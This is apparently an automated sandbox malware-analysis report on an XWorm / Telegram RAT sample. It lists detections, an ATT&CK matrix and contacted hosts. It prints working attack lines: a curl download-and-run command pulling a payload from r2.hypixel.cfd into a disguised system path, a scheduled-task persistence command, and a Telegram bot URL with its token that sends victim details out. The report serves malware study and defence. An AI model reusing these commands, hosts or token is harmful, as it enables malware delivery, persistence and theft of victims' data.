                            Source: svchost.exe, 00000007.00000002.3718902466.000002B128E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                            Source: svchost.exe, 00000007.00000002.3719807106.000002B128F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000007.00000002.3719311899.000002B128E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: curl.exe, 00000004.00000003.1272935149.0000016CB93A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3719238486.000002117C22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Source: C:\Windows\StartMenuExperienceHost.exeCode function: 12_2_00007FFAAC3B7BE1 CheckRemoteDebuggerPresent,12_2_00007FFAAC3B7BE1
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C920C5C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF77C920C5C
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C9207B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF77C9207B4
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C920E04 SetUnhandledExceptionFilter,0_2_00007FF77C920E04
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C920C5C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF77C920C5C
                            Source: C:\Windows\StartMenuExperienceHost.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silentJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color bJump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exeJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silentJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\StartMenuExperienceHost.exe C:\Windows\StartMenuExperienceHost.exeJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"Jump to behavior

                            Language, Device and Operating System Detection

                            barindex
                            Yara detected Telegram Recon
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeQueries volume information: C:\Windows\StartMenuExperienceHost.exe VolumeInformationJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeCode function: 0_2_00007FF77C920E78 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF77C920E78
                            Source: C:\Windows\StartMenuExperienceHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Changes security center settings (notifications, updates, antivirus, firewall)
                            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
                            Source: svchost.exe, 00000009.00000002.3720185441.0000025157F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                            Source: svchost.exe, 00000009.00000002.3720185441.0000025157F02000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD28000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD0A000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724844812.000000001CADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                            Source: C:\Windows\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3720613599.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                            Remote Access Functionality

                            barindex
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3720613599.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		11
                            Input Capture                            		1
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            File and Directory Discovery                            		Remote Desktop Protocol11
                            Input Capture                            		13
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            Scheduled Task/Job                            		11
                            Process Injection                            		1
                            Obfuscated Files or Information                            		Security Account Manager34
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron21
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		2
                            Software Packing                            		NTDS571
                            Security Software Discovery                            		Distributed Component Object ModelInput Capture1
                            Non-Standard Port                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                            Registry Run Keys / Startup Folder                            		1
                            DLL Side-Loading                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging3
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
                            Masquerading                            		Cached Domain Credentials171
                            Virtualization/Sandbox Evasion                            		VNCGUI Input Capture14
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items171
                            Virtualization/Sandbox Evasion                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection                            		Proc Filesystem1
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561587 Sample: 18sFhgSyVK.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 47 api.telegram.org 2->47 49 r2.hypixel.cfd 2->49 51 2 other IPs or domains 2->51 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 79 19 other signatures 2->79 10 18sFhgSyVK.exe 1 2->10         started        12 svchost.exe 1 2->12         started        15 svchost.exe 2->15         started        17 10 other processes 2->17 signatures3 77 Uses the Telegram API (likely for C&C communication) 47->77 process4 signatures5 19 cmd.exe 1 10->19         started        22 cmd.exe 1 10->22         started        24 conhost.exe 10->24         started        26 cmd.exe 1 10->26         started        83 Antivirus detection for dropped file 12->83 85 Multi AV Scanner detection for dropped file 12->85 87 Machine Learning detection for dropped file 12->87 89 Changes security center settings (notifications, updates, antivirus, firewall) 15->89 28 MpCmdRun.exe 15->28         started        process6 signatures7 81 Drops executables to the windows directory (C:\Windows) and starts them 19->81 30 StartMenuExperienceHost.exe 15 6 19->30         started        35 curl.exe 2 22->35         started        37 conhost.exe 28->37         started        process8 dnsIp9 53 ip-api.com 208.95.112.1, 49702, 80 TUT-ASUS United States 30->53 55 api.telegram.org 149.154.167.220, 443, 49704 TELEGRAMRU United Kingdom 30->55 57 104.198.168.179, 1337, 49711 GOOGLEUS United States 30->57 43 C:\Users\user\AppData\Local\...\svchost.exe, PE32 30->43 dropped 63 Antivirus detection for dropped file 30->63 65 Multi AV Scanner detection for dropped file 30->65 67 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->67 69 6 other signatures 30->69 39 schtasks.exe 1 30->39         started        59 r2.hypixel.cfd 172.66.0.158, 443, 49701 CLOUDFLARENETUS United States 35->59 61 127.0.0.1 unknown unknown 35->61 45 C:\Windows\StartMenuExperienceHost.exe, PE32 35->45 dropped file10 signatures11 process12 process13 41 conhost.exe 39->41         started       

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            18sFhgSyVK.exe24%ReversingLabs

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Windows\StartMenuExperienceHost.exe100%AviraTR/Spy.Gen
                            C:\Users\user\AppData\Local\Temp\svchost.exe100%AviraTR/Spy.Gen
                            C:\Windows\StartMenuExperienceHost.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\svchost.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\svchost.exe88%ReversingLabsByteCode-MSIL.Ransomware.CryptConsole
                            C:\Windows\StartMenuExperienceHost.exe88%ReversingLabsByteCode-MSIL.Ransomware.CryptConsole

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://r2.hypixel.cfd/svchost.exe-oC:0%Avira URL Cloudsafe
                            https://r2.hypixel.cfd/svchost.exe100%Avira URL Cloudmalware
                            104.198.168.1790%Avira URL Cloudsafe
                            https://r2.hypixel.cfd/svchost.exe(0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            r2.hypixel.cfd
                            		172.66.0.158
                            		truetrue
                              		unknown
                              ip-api.com
                              		208.95.112.1
                              		truefalse
                                		high
                                api.telegram.org
                                		149.154.167.220
                                		truefalse
                                  		high
                                  time.windows.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    104.198.168.179true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://r2.hypixel.cfd/svchost.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                                      		high
                                      127.0.0.1false
                                        		high
                                        http://ip-api.com/line/?fields=hostingfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/botStartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.drfalse
                                                		high
                                                https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://r2.hypixel.cfd/svchost.exe(curl.exe, 00000004.00000002.1273183923.0000016CB93CB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000005.00000003.1364326636.00000135A5675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.1364653557.00000135A5647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://dynamic.tsvchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://r2.hypixel.cfd/svchost.exe-oC:curl.exe, 00000004.00000002.1273129101.0000016CB9390000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
